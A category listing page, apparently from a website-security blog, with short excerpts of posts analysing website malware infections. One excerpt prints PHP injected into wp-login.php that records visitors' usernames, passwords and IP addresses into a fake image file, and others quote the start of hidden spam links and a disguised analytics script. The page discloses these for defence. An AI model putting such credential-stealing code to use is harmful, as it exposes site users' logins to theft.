Simple but effective backdoor
Luke Leal We recently found a malicious PHP file containing a small amount of code that is effective at hiding from detection by various server side scanning…
Browsing Category
Website Malware Infections
851 posts
Simple WP login stealer
We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
“Loader for Secured Files” and arrayed b374k shell encoding
This file (33×77.php) was detected in the document root of a website during a website cleanup for a client. It demonstrates how hackers sometimes use…
Spam Doorway Manager
While investigating a client’s compromised website, we saw a malicious file that was being used to manage an existing SEO spam doorway. We usually refer…
Shoesinfy Spam Injections
Denis Sinegubko Lately, we’ve seen quite a few sites with injected spammy links that follow this format: <div style=”position: absolute; opacity: 0.001; z-index: 10; filter: alpha(opacity=0);”> <a…
Backdoor plugin hides from view
One of the most important traits for backdoors is the ability to remain undetected by most users — otherwise it may draw suspicion and be…
Google Analytics Swiper Disguised as Legitimate Traffic
At first glance, this short script looks like benign Google Analytics code: <script type=”text/javascript”> (function() { var ga = document.createElement(‘script’); ga.type = ‘text/javascript’; ga.async =…
FBCMS Pharmacy Spam Website
Whenever most people think of a website CMS, they most often think of the popular options like WordPress, Joomla, or Drupal. What do all three…
Reset Email Account Passwords after Website Infection: Follow Up
In a previous analysis of a malicious file, we demonstrated why you should always update your email account passwords after a security compromise. The information…
The Strange Case of the Malicious Favicon
Néstor Angulo During the past year, our Remediation department has seen a large increase in the number of fully spammed sites. The common factors are strangely named…
WPTF Hybrid Composer – Unauthenticated Arbitrary Options Update
John Castro With almost 300 installs, WPTF – Hybrid Composer is a framework that helps users easily create custom themes for WordPress. We recently noticed an increase…